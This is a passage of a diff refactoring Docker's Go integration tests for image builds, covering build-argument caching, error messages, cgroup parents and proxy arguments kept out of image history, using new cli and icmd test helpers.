-	}
-
-	removeLogTimestamps := func(s string) string {
-		return regexp.MustCompile(`time="(.*?)"`).ReplaceAllString(s, `time=[TIMESTAMP]`)
-	}
-
-	// Skip over the times
-	e1 := removeLogTimestamps(err1.Error())
-	e2 := removeLogTimestamps(err2.Error())
-
-	// Ignore whitespace since that's what were verifying doesn't change stuff
-	if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) {
-		c.Fatalf("Build 2's error wasn't the same as build 1's\n1:%s\n2:%s", err1, err2)
+
+	// Skip over the times
+	e1 := removeLogTimestamps(result1.Error.Error())
+	e2 := removeLogTimestamps(result2.Error.Error())
+
+	// Ignore whitespace since that's what were verifying doesn't change stuff
+	if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) {
+		c.Fatalf("Build 2's error wasn't the same as build 1's\n1:%s\n2:%s", result1.Error, result2.Error)
 	}
 
 	ctx.Add("Dockerfile", "FROM busybox\n   COPY")
-	if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil {
-		c.Fatal("Build 3 was supposed to fail, but didn't")
-	}
+	result2 = cli.Docker(cli.Build(name), build.WithoutCache, build.WithExternalBuildContext(ctx))
+	result2.Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
 
 	// Skip over the times
-	e1 = removeLogTimestamps(err1.Error())
-	e2 = removeLogTimestamps(err2.Error())
+	e1 = removeLogTimestamps(result1.Error.Error())
+	e2 = removeLogTimestamps(result2.Error.Error())
 
 	// Ignore whitespace since that's what were verifying doesn't change stuff
 	if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) {
-		c.Fatalf("Build 3's error wasn't the same as build 1's\n1:%s\n3:%s", err1, err2)
+		c.Fatalf("Build 3's error wasn't the same as build 1's\n1:%s\n3:%s", result1.Error, result2.Error)
 	}
 
 	ctx.Add("Dockerfile", "FROM busybox\n   COPY    ")
-	if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil {
-		c.Fatal("Build 4 was supposed to fail, but didn't")
-	}
+	result2 = cli.Docker(cli.Build(name), build.WithoutCache, build.WithExternalBuildContext(ctx))
+	result2.Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
 
 	// Skip over the times
-	e1 = removeLogTimestamps(err1.Error())
-	e2 = removeLogTimestamps(err2.Error())
+	e1 = removeLogTimestamps(result1.Error.Error())
+	e2 = removeLogTimestamps(result2.Error.Error())
 
 	// Ignore whitespace since that's what were verifying doesn't change stuff
 	if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) {
-		c.Fatalf("Build 4's error wasn't the same as build 1's\n1:%s\n4:%s", err1, err2)
+		c.Fatalf("Build 4's error wasn't the same as build 1's\n1:%s\n4:%s", result1.Error, result2.Error)
 	}
 
 }
@@ -5183,39 +3864,31 @@ func (s *DockerSuite) TestBuildSpacesWithQuotes(c *check.C) {
 RUN echo "  \
   foo  "`
 
-	_, out, err := buildImageWithOut(name, dockerfile, false)
-	if err != nil {
-		c.Fatal("Build failed:", err)
-	}
-
-	expecting := "\n    foo  \n"
+	expected := "\n    foo  \n"
 	// Windows uses the builtin echo, which preserves quotes
-	if daemonPlatform == "windows" {
-		expecting = "\"    foo  \""
-	}
-	if !strings.Contains(out, expecting) {
-		c.Fatalf("Bad output: %q expecting to contain %q", out, expecting)
+	if testEnv.OSType == "windows" {
+		expected = "\"    foo  \""
 	}
 
+	buildImage(name, build.WithDockerfile(dockerfile)).Assert(c, icmd.Expected{
+		Out: expected,
+	})
 }
 
 // #4393
 func (s *DockerSuite) TestBuildVolumeFileExistsinContainer(c *check.C) {
 	testRequires(c, DaemonIsLinux) // TODO Windows: This should error out
-	buildCmd := exec.Command(dockerBinary, "build", "-t", "docker-test-errcreatevolumewithfile", "-")
-	buildCmd.Stdin = strings.NewReader(`
+	buildImage("docker-test-errcreatevolumewithfile", build.WithDockerfile(`
 	FROM busybox
 	RUN touch /foo
 	VOLUME /foo
-	`)
-
-	out, _, err := runCommandWithOutput(buildCmd)
-	if err == nil || !strings.Contains(out, "file exists") {
-		c.Fatalf("expected build to fail when file exists in container at requested volume path")
-	}
-
+	`)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "file exists",
+	})
 }
 
+// FIXME(vdemeester) should be a unit test
 func (s *DockerSuite) TestBuildMissingArgs(c *check.C) {
 	// Test to make sure that all Dockerfile commands (except the ones listed
 	// in skipCmds) will generate an error if no args are provided.
@@ -5227,7 +3900,7 @@ func (s *DockerSuite) TestBuildMissingArgs(c *check.C) {
 		"INSERT":     {},
 	}
 
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		skipCmds = map[string]struct{}{
 			"CMD":        {},
 			"RUN":        {},
@@ -5245,7 +3918,6 @@ func (s *DockerSuite) TestBuildMissingArgs(c *check.C) {
 		if _, ok := skipCmds[cmd]; ok {
 			continue
 		}
-
 		var dockerfile string
 		if cmd == "FROM" {
 			dockerfile = cmd
@@ -5254,148 +3926,104 @@ func (s *DockerSuite) TestBuildMissingArgs(c *check.C) {
 			dockerfile = "FROM busybox\n" + cmd
 		}
 
-		ctx, err := fakeContext(dockerfile, map[string]string{})
-		if err != nil {
-			c.Fatal(err)
-		}
-		defer ctx.Close()
-		var out string
-		if out, err = buildImageFromContext("args", ctx, true); err == nil {
-			c.Fatalf("%s was supposed to fail. Out:%s", cmd, out)
-		}
-		if !strings.Contains(err.Error(), cmd+" requires") {
-			c.Fatalf("%s returned the wrong type of error:%s", cmd, err)
-		}
+		buildImage("args", build.WithDockerfile(dockerfile)).Assert(c, icmd.Expected{
+			ExitCode: 1,
+			Err:      cmd + " requires",
+		})
 	}
 
 }
 
 func (s *DockerSuite) TestBuildEmptyScratch(c *check.C) {
 	testRequires(c, DaemonIsLinux)
-	_, out, err := buildImageWithOut("sc", "FROM scratch", true)
-	if err == nil {
-		c.Fatalf("Build was supposed to fail")
-	}
-	if !strings.Contains(out, "No image was generated") {
-		c.Fatalf("Wrong error message: %v", out)
-	}
+	buildImage("sc", build.WithDockerfile("FROM scratch")).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "No image was generated",
+	})
 }
 
 func (s *DockerSuite) TestBuildDotDotFile(c *check.C) {
-	ctx, err := fakeContext("FROM busybox\n",
-		map[string]string{
-			"..gitme": "",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err = buildImageFromContext("sc", ctx, false); err != nil {
-		c.Fatalf("Build was supposed to work: %s", err)
-	}
+	buildImageSuccessfully(c, "sc", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", "FROM busybox\n"),
+		build.WithFile("..gitme", ""),
+	))
 }
 
 func (s *DockerSuite) TestBuildRUNoneJSON(c *check.C) {
 	testRequires(c, DaemonIsLinux) // No hello-world Windows image
 	name := "testbuildrunonejson"
 
-	ctx, err := fakeContext(`FROM hello-world:frozen
-RUN [ "/hello" ]`, map[string]string{})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--no-cache", "-t", name, ".")
-	if err != nil {
-		c.Fatalf("failed to build the image: %s, %v", out, err)
-	}
-
-	if !strings.Contains(out, "Hello from Docker") {
-		c.Fatalf("bad output: %s", out)
-	}
-
+	buildImage(name, build.WithDockerfile(`FROM hello-world:frozen
+RUN [ "/hello" ]`)).Assert(c, icmd.Expected{
+		Out: "Hello from Docker",
+	})
 }
 
 func (s *DockerSuite) TestBuildEmptyStringVolume(c *check.C) {
 	name := "testbuildemptystringvolume"
 
-	_, err := buildImage(name, `
+	buildImage(name, build.WithDockerfile(`
   FROM busybox
   ENV foo=""
   VOLUME $foo
-  `, false)
-	if err == nil {
-		c.Fatal("Should have failed to build")
-	}
-
+  `)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
 }
 
 func (s *DockerSuite) TestBuildContainerWithCgroupParent(c *check.C) {
-	testRequires(c, SameHostDaemon)
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
 
 	cgroupParent := "test"
 	data, err := ioutil.ReadFile("/proc/self/cgroup")
 	if err != nil {
 		c.Fatalf("failed to read '/proc/self/cgroup - %v", err)
 	}
-	selfCgroupPaths := parseCgroupPaths(string(data))
+	selfCgroupPaths := ParseCgroupPaths(string(data))
 	_, found := selfCgroupPaths["memory"]
 	if !found {
 		c.Fatalf("unable to find self memory cgroup path. CgroupsPath: %v", selfCgroupPaths)
 	}
-	cmd := exec.Command(dockerBinary, "build", "--cgroup-parent", cgroupParent, "-")
-	cmd.Stdin = strings.NewReader(`
+	result := buildImage("buildcgroupparent",
+		cli.WithFlags("--cgroup-parent", cgroupParent),
+		build.WithDockerfile(`
 FROM busybox
 RUN cat /proc/self/cgroup
-`)
-
-	out, _, err := runCommandWithOutput(cmd)
-	if err != nil {
-		c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err)
-	}
-	m, err := regexp.MatchString(fmt.Sprintf("memory:.*/%s/.*", cgroupParent), out)
+`))
+	result.Assert(c, icmd.Success)
+	m, err := regexp.MatchString(fmt.Sprintf("memory:.*/%s/.*", cgroupParent), result.Combined())
 	c.Assert(err, check.IsNil)
 	if !m {
-		c.Fatalf("There is no expected memory cgroup with parent /%s/: %s", cgroupParent, out)
+		c.Fatalf("There is no expected memory cgroup with parent /%s/: %s", cgroupParent, result.Combined())
 	}
 }
 
+// FIXME(vdemeester) could be a unit test
 func (s *DockerSuite) TestBuildNoDupOutput(c *check.C) {
 	// Check to make sure our build output prints the Dockerfile cmd
 	// property - there was a bug that caused it to be duplicated on the
 	// Step X  line
 	name := "testbuildnodupoutput"
-
-	_, out, err := buildImageWithOut(name, `
+	result := buildImage(name, build.WithDockerfile(`
   FROM busybox
-  RUN env`, false)
-	if err != nil {
-		c.Fatalf("Build should have worked: %q", err)
-	}
-
+  RUN env`))
+	result.Assert(c, icmd.Success)
 	exp := "\nStep 2/2 : RUN env\n"
-	if !strings.Contains(out, exp) {
-		c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", out, exp)
+	if !strings.Contains(result.Combined(), exp) {
+		c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", result.Combined(), exp)
 	}
 }
 
 // GH15826
+// FIXME(vdemeester) could be a unit test
 func (s *DockerSuite) TestBuildStartsFromOne(c *check.C) {
 	// Explicit check to ensure that build starts from step 1 rather than 0
 	name := "testbuildstartsfromone"
-
-	_, out, err := buildImageWithOut(name, `
-  FROM busybox`, false)
-	if err != nil {
-		c.Fatalf("Build should have worked: %q", err)
-	}
-
+	result := buildImage(name, build.WithDockerfile(`FROM busybox`))
+	result.Assert(c, icmd.Success)
 	exp := "\nStep 1/1 : FROM busybox\n"
-	if !strings.Contains(out, exp) {
-		c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", out, exp)
+	if !strings.Contains(result.Combined(), exp) {
+		c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", result.Combined(), exp)
 	}
 }
 
@@ -5403,228 +4031,49 @@ func (s *DockerSuite) TestBuildRUNErrMsg(c *check.C) {
 	// Test to make sure the bad command is quoted with just "s and
 	// not as a Go []string
 	name := "testbuildbadrunerrmsg"
-	_, out, err := buildImageWithOut(name, `
-  FROM busybox
-  RUN badEXE a1 \& a2	a3`, false) // tab between a2 and a3
-	if err == nil {
-		c.Fatal("Should have failed to build")
-	}
 	shell := "/bin/sh -c"
-	exitCode := "127"
-	if daemonPlatform == "windows" {
+	exitCode := 127
+	if testEnv.OSType == "windows" {
 		shell = "cmd /S /C"
 		// architectural - Windows has to start the container to determine the exe is bad, Linux does not
-		exitCode = "1"
-	}
-	exp := `The command '` + shell + ` badEXE a1 \& a2	a3' returned a non-zero code: ` + exitCode
-	if !strings.Contains(out, exp) {
-		c.Fatalf("RUN doesn't have the correct output:\nGot:%s\nExpected:%s", out, exp)
-	}
-}
-
-func (s *DockerTrustSuite) TestTrustedBuild(c *check.C) {
-	repoName := s.setupTrustedImage(c, "trusted-build")
-	dockerFile := fmt.Sprintf(`
-  FROM %s
-  RUN []
-    `, repoName)
-
-	name := "testtrustedbuild"
-
-	buildCmd := buildImageCmd(name, dockerFile, true)
-	s.trustedCmd(buildCmd)
-	out, _, err := runCommandWithOutput(buildCmd)
-	if err != nil {
-		c.Fatalf("Error running trusted build: %s\n%s", err, out)
-	}
-
-	if !strings.Contains(out, fmt.Sprintf("FROM %s@sha", repoName[:len(repoName)-7])) {
-		c.Fatalf("Unexpected output on trusted build:\n%s", out)
-	}
-
-	// We should also have a tag reference for the image.
-	if out, exitCode := dockerCmd(c, "inspect", repoName); exitCode != 0 {
-		c.Fatalf("unexpected exit code inspecting image %q: %d: %s", repoName, exitCode, out)
-	}
-
-	// We should now be able to remove the tag reference.
-	if out, exitCode := dockerCmd(c, "rmi", repoName); exitCode != 0 {
-		c.Fatalf("unexpected exit code inspecting image %q: %d: %s", repoName, exitCode, out)
-	}
-}
-
-func (s *DockerTrustSuite) TestTrustedBuildUntrustedTag(c *check.C) {
-	repoName := fmt.Sprintf("%v/dockercli/build-untrusted-tag:latest", privateRegistryURL)
-	dockerFile := fmt.Sprintf(`
-  FROM %s
-  RUN []
-    `, repoName)
-
-	name := "testtrustedbuilduntrustedtag"
-
-	buildCmd := buildImageCmd(name, dockerFile, true)
-	s.trustedCmd(buildCmd)
-	out, _, err := runCommandWithOutput(buildCmd)
-	if err == nil {
-		c.Fatalf("Expected error on trusted build with untrusted tag: %s\n%s", err, out)
+		exitCode = 1
 	}
+	exp := fmt.Sprintf(`The command '%s badEXE a1 \& a2	a3' returned a non-zero code: %d`, shell, exitCode)
 
-	if !strings.Contains(out, "does not have trust data for") {
-		c.Fatalf("Unexpected output on trusted build with untrusted tag:\n%s", out)
-	}
-}
-
-func (s *DockerTrustSuite) TestBuildContextDirIsSymlink(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	tempDir, err := ioutil.TempDir("", "test-build-dir-is-symlink-")
-	c.Assert(err, check.IsNil)
-	defer os.RemoveAll(tempDir)
-
-	// Make a real context directory in this temp directory with a simple
-	// Dockerfile.
-	realContextDirname := filepath.Join(tempDir, "context")
-	if err := os.Mkdir(realContextDirname, os.FileMode(0755)); err != nil {
-		c.Fatal(err)
-	}
-
-	if err = ioutil.WriteFile(
-		filepath.Join(realContextDirname, "Dockerfile"),
-		[]byte(`
-			FROM busybox
-			RUN echo hello world
-		`),
-		os.FileMode(0644),
-	); err != nil {
-		c.Fatal(err)
-	}
-
-	// Make a symlink to the real context directory.
-	contextSymlinkName := filepath.Join(tempDir, "context_link")
-	if err := os.Symlink(realContextDirname, contextSymlinkName); err != nil {
-		c.Fatal(err)
-	}
-
-	// Executing the build with the symlink as the specified context should
-	// *not* fail.
-	if out, exitStatus := dockerCmd(c, "build", contextSymlinkName); exitStatus != 0 {
-		c.Fatalf("build failed with exit status %d: %s", exitStatus, out)
-	}
-}
-
-func (s *DockerTrustSuite) TestTrustedBuildTagFromReleasesRole(c *check.C) {
-	testRequires(c, NotaryHosting)
-
-	latestTag := s.setupTrustedImage(c, "trusted-build-releases-role")
-	repoName := strings.TrimSuffix(latestTag, ":latest")
-
-	// Now create the releases role
-	s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public)
-	s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private)
-	s.notaryPublish(c, repoName)
-
-	// push a different tag to the releases role
-	otherTag := fmt.Sprintf("%s:other", repoName)
-	dockerCmd(c, "tag", "busybox", otherTag)
-
-	pushCmd := exec.Command(dockerBinary, "push", otherTag)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf("Trusted push failed: %s", out))
-	s.assertTargetInRoles(c, repoName, "other", "targets/releases")
-	s.assertTargetNotInRoles(c, repoName, "other", "targets")
-
-	out, status := dockerCmd(c, "rmi", otherTag)
-	c.Assert(status, check.Equals, 0, check.Commentf("docker rmi failed: %s", out))
-
-	dockerFile := fmt.Sprintf(`
-  FROM %s
-  RUN []
-    `, otherTag)
-
-	name := "testtrustedbuildreleasesrole"
-
-	buildCmd := buildImageCmd(name, dockerFile, true)
-	s.trustedCmd(buildCmd)
-	out, _, err = runCommandWithOutput(buildCmd)
-	c.Assert(err, check.IsNil, check.Commentf("Trusted build failed: %s", out))
-	c.Assert(out, checker.Contains, fmt.Sprintf("FROM %s@sha", repoName))
-}
-
-func (s *DockerTrustSuite) TestTrustedBuildTagIgnoresOtherDelegationRoles(c *check.C) {
-	testRequires(c, NotaryHosting)
-
-	latestTag := s.setupTrustedImage(c, "trusted-build-releases-role")
-	repoName := strings.TrimSuffix(latestTag, ":latest")
-
-	// Now create a non-releases delegation role
-	s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[0].Public)
-	s.notaryImportKey(c, repoName, "targets/other", s.not.keys[0].Private)
-	s.notaryPublish(c, repoName)
-
-	// push a different tag to the other role
-	otherTag := fmt.Sprintf("%s:other", repoName)
-	dockerCmd(c, "tag", "busybox", otherTag)
-
-	pushCmd := exec.Command(dockerBinary, "push", otherTag)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf("Trusted push failed: %s", out))
-	s.assertTargetInRoles(c, repoName, "other", "targets/other")
-	s.assertTargetNotInRoles(c, repoName, "other", "targets")
-
-	out, status := dockerCmd(c, "rmi", otherTag)
-	c.Assert(status, check.Equals, 0, check.Commentf("docker rmi failed: %s", out))
-
-	dockerFile := fmt.Sprintf(`
-  FROM %s
-  RUN []
-    `, otherTag)
-
-	name := "testtrustedbuildotherrole"
-
-	buildCmd := buildImageCmd(name, dockerFile, true)
-	s.trustedCmd(buildCmd)
-	out, _, err = runCommandWithOutput(buildCmd)
-	c.Assert(err, check.NotNil, check.Commentf("Trusted build expected to fail: %s", out))
+	buildImage(name, build.WithDockerfile(`
+  FROM busybox
+  RUN badEXE a1 \& a2	a3`)).Assert(c, icmd.Expected{
+		ExitCode: exitCode,
+		Err:      exp,
+	})
 }
 
 // Issue #15634: COPY fails when path starts with "null"
 func (s *DockerSuite) TestBuildNullStringInAddCopyVolume(c *check.C) {
 	name := "testbuildnullstringinaddcopyvolume"
-
 	volName := "nullvolume"
-
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		volName = `C:\\nullvolume`
 	}
 
-	ctx, err := fakeContext(`
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `
 		FROM busybox
 
 		ADD null /
 		COPY nullfile /
 		VOLUME `+volName+`
-		`,
-		map[string]string{
-			"null":     "test1",
-			"nullfile": "test2",
-		},
-	)
-	c.Assert(err, check.IsNil)
-	defer ctx.Close()
-
-	_, err = buildImageFromContext(name, ctx, true)
-	c.Assert(err, check.IsNil)
+		`),
+		build.WithFile("null", "test1"),
+		build.WithFile("nullfile", "test2"),
+	))
 }
 
 func (s *DockerSuite) TestBuildStopSignal(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Windows does not support STOPSIGNAL yet
 	imgName := "test_build_stop_signal"
-	_, err := buildImage(imgName,
-		`FROM busybox
-		 STOPSIGNAL SIGKILL`,
-		true)
-	c.Assert(err, check.IsNil)
+	buildImageSuccessfully(c, imgName, build.WithDockerfile(`FROM busybox
+		 STOPSIGNAL SIGKILL`))
 	res := inspectFieldJSON(c, imgName, "Config.StopSignal")
 	if res != `"SIGKILL"` {
 		c.Fatalf("Signal %s, expected SIGKILL", res)
@@ -5632,7 +4081,6 @@ func (s *DockerSuite) TestBuildStopSignal(c *check.C) {
 
 	containerName := "test-container-stop-signal"
 	dockerCmd(c, "run", "-d", "--name", containerName, imgName, "top")
-
 	res = inspectFieldJSON(c, containerName, "Config.StopSignal")
 	if res != `"SIGKILL"` {
 		c.Fatalf("Signal %s, expected SIGKILL", res)
@@ -5643,9 +4091,8 @@ func (s *DockerSuite) TestBuildBuildTimeArg(c *check.C) {
 	imgName := "bldargtest"
 	envKey := "foo"
 	envVal := "bar"
-	args := []string{"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)}
 	var dockerfile string
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		// Bugs in Windows busybox port - use the default base image and native cmd stuff
 		dockerfile = fmt.Sprintf(`FROM `+minimalBaseImage()+`
 			ARG %s
@@ -5658,13 +4105,12 @@ func (s *DockerSuite) TestBuildBuildTimeArg(c *check.C) {
 			CMD echo $%s`, envKey, envKey, envKey)
 
 	}
-
-	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) {
-		if err != nil {
-			c.Fatalf("build failed to complete: %q %q", out, err)
-		}
-		c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal)
-	}
+	buildImage(imgName,
+		cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)),
+		build.WithDockerfile(dockerfile),
+	).Assert(c, icmd.Expected{
+		Out: envVal,
+	})
 
 	containerName := "bldargCont"
 	out, _ := dockerCmd(c, "run", "--name", containerName, imgName)
@@ -5679,18 +4125,14 @@ func (s *DockerSuite) TestBuildBuildTimeArgHistory(c *check.C) {
 	envKey := "foo"
 	envVal := "bar"
 	envDef := "bar1"
-	args := []string{
-		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
-	}
 	dockerfile := fmt.Sprintf(`FROM busybox
 		ARG %s=%s`, envKey, envDef)
-
-	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) {
-		if err != nil {
-			c.Fatalf("build failed to complete: %q %q", out, err)
-		}
-		c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal)
-	}
+	buildImage(imgName,
+		cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)),
+		build.WithDockerfile(dockerfile),
+	).Assert(c, icmd.Expected{
+		Out: envVal,
+	})
 
 	out, _ := dockerCmd(c, "history", "--no-trunc", imgName)
 	outputTabs := strings.Split(out, "\n")[1]
@@ -5699,28 +4141,66 @@ func (s *DockerSuite) TestBuildBuildTimeArgHistory(c *check.C) {
 	}
 }
 
-func (s *DockerSuite) TestBuildBuildTimeArgCacheHit(c *check.C) {
+func (s *DockerSuite) TestBuildTimeArgHistoryExclusions(c *check.C) {
 	imgName := "bldargtest"
 	envKey := "foo"
 	envVal := "bar"
-	args := []string{
-		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
-	}
+	proxy := "HTTP_PROXY=http://user:password@proxy.example.com"
+	explicitProxyKey := "http_proxy"
+	explicitProxyVal := "http://user:password@someproxy.example.com"
 	dockerfile := fmt.Sprintf(`FROM busybox
 		ARG %s
-		RUN echo $%s`, envKey, envKey)
+		ARG %s
+		RUN echo "Testing Build Args!"`, envKey, explicitProxyKey)
 
-	origImgID := ""
-	var err error
-	if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil {
-		c.Fatal(err)
+	buildImage := func(imgName string) string {
+		cli.BuildCmd(c, imgName,
+			cli.WithFlags("--build-arg", "https_proxy=https://proxy.example.com",
+				"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
+				"--build-arg", fmt.Sprintf("%s=%s", explicitProxyKey, explicitProxyVal),
+				"--build-arg", proxy),
+			build.WithDockerfile(dockerfile),
+		)
+		return getIDByName(c, imgName)
+	}
+
+	origID := buildImage(imgName)
+	result := cli.DockerCmd(c, "history", "--no-trunc", imgName)
+	out := result.Stdout()
+
+	if strings.Contains(out, proxy) {
+		c.Fatalf("failed to exclude proxy settings from history!")
 	}
+	if strings.Contains(out, "https_proxy") {
+		c.Fatalf("failed to exclude proxy settings from history!")
+	}
+	result.Assert(c, icmd.Expected{Out: fmt.Sprintf("%s=%s", envKey, envVal)})
+	result.Assert(c, icmd.Expected{Out: fmt.Sprintf("%s=%s", explicitProxyKey, explicitProxyVal)})
+
+	cacheID := buildImage(imgName + "-two")
+	c.Assert(origID, checker.Equals, cacheID)
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgCacheHit(c *check.C) {
+	imgName := "bldargtest"
+	envKey := "foo"
+	envVal := "bar"
+	dockerfile := fmt.Sprintf(`FROM busybox
+		ARG %s
+		RUN echo $%s`, envKey, envKey)
+	buildImageSuccessfully(c, imgName,
+		cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)),
+		build.WithDockerfile(dockerfile),
+	)
+	origImgID := getIDByName(c, imgName)
 
 	imgNameCache := "bldargtestcachehit"
-	if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID != origImgID {
-		if err != nil {
-			c.Fatal(err)
-		}
+	buildImageSuccessfully(c, imgNameCache,
+		cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)),
+		build.WithDockerfile(dockerfile),
+	)
+	newImgID := getIDByName(c, imgName)
+	if newImgID != origImgID {
 		c.Fatalf("build didn't use cache! expected image id: %q built image id: %q", origImgID, newImgID)
 	}
 }
@@ -5731,27 +4211,27 @@ func (s *DockerSuite) TestBuildBuildTimeArgCacheMissExtraArg(c *check.C) {
 	envVal := "bar"
 	extraEnvKey := "foo1"
 	extraEnvVal := "bar1"
-	args := []string{
-		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
-	}
-
 	dockerfile := fmt.Sprintf(`FROM busybox
 		ARG %s
 		ARG %s
 		RUN echo $%s`, envKey, extraEnvKey, envKey)
-
-	origImgID := ""
-	var err error
-	if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, imgName,
+		cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)),
+		build.WithDockerfile(dockerfile),
+	)
+	origImgID := getIDByName(c, imgName)
 
 	imgNameCache := "bldargtestcachemiss"
-	args = append(args, "--build-arg", fmt.Sprintf("%s=%s", extraEnvKey, extraEnvVal))
-	if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID == origImgID {
-		if err != nil {
-			c.Fatal(err)
-		}
+	buildImageSuccessfully(c, imgNameCache,
+		cli.WithFlags(
+			"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
+			"--build-arg", fmt.Sprintf("%s=%s", extraEnvKey, extraEnvVal),
+		),
+		build.WithDockerfile(dockerfile),
+	)
+	newImgID := getIDByName(c, imgNameCache)
+
+	if newImgID == origImgID {
 		c.Fatalf("build used cache, expected a miss!")
 	}
 }
@@ -5761,28 +4241,22 @@ func (s *DockerSuite) TestBuildBuildTimeArgCacheMissSameArgDiffVal(c *check.C) {
 	envKey := "foo"
 	envVal := "bar"
 	newEnvVal := "bar1"
-	args := []string{
-		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
-	}
-
 	dockerfile := fmt.Sprintf(`FROM busybox
 		ARG %s
 		RUN echo $%s`, envKey, envKey)
-
-	origImgID := ""
-	var err error
-	if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, imgName,
+		cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)),
+		build.WithDockerfile(dockerfile),
+	)
+	origImgID := getIDByName(c, imgName)
 
 	imgNameCache := "bldargtestcachemiss"
-	args = []string{
-		"--build-arg", fmt.Sprintf("%s=%s", envKey, newEnvVal),
-	}
-	if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID == origImgID {
-		if err != nil {
-			c.Fatal(err)
-		}
+	buildImageSuccessfully(c, imgNameCache,
+		cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, newEnvVal)),
+		build.WithDockerfile(dockerfile),
+	)
+	newImgID := getIDByName(c, imgNameCache)
+	if newImgID == origImgID {
 		c.Fatalf("build used cache, expected a miss!")
 	}
 }
@@ -5792,61 +4266,58 @@ func (s *DockerSuite) TestBuildBuildTimeArgOverrideArgDefinedBeforeEnv(c *check.
 	imgName := "bldargtest"
 	envKey := "foo"
 	envVal := "bar"
-	envValOveride := "barOverride"
-	args := []string{
-		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
-	}
+	envValOverride := "barOverride"
 	dockerfile := fmt.Sprintf(`FROM busybox
 		ARG %s
 		ENV %s %s
 		RUN echo $%s
 		CMD echo $%s
-        `, envKey, envKey, envValOveride, envKey, envKey)
+        `, envKey, envKey, envValOverride, envKey, envKey)
 
-	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 {
-		if err != nil {
-			c.Fatalf("build failed to complete: %q %q", out, err)
-		}
-		c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride)
+	result := buildImage(imgName,
+		cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)),
+		build.WithDockerfile(dockerfile),
+	)
+	result.Assert(c, icmd.Success)
+	if strings.Count(result.Combined(), envValOverride) != 2 {
+		c.Fatalf("failed to access environment variable in output: %q expected: %q", result.Combined(), envValOverride)
 	}
 
 	containerName := "bldargCont"
-	if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) {
-		c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride)
+	if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOverride) {
+		c.Fatalf("run produced invalid output: %q, expected %q", out, envValOverride)
 	}
 }
 
+// FIXME(vdemeester) might be useful to merge with the one above ?
 func (s *DockerSuite) TestBuildBuildTimeArgOverrideEnvDefinedBeforeArg(c *check.C) {
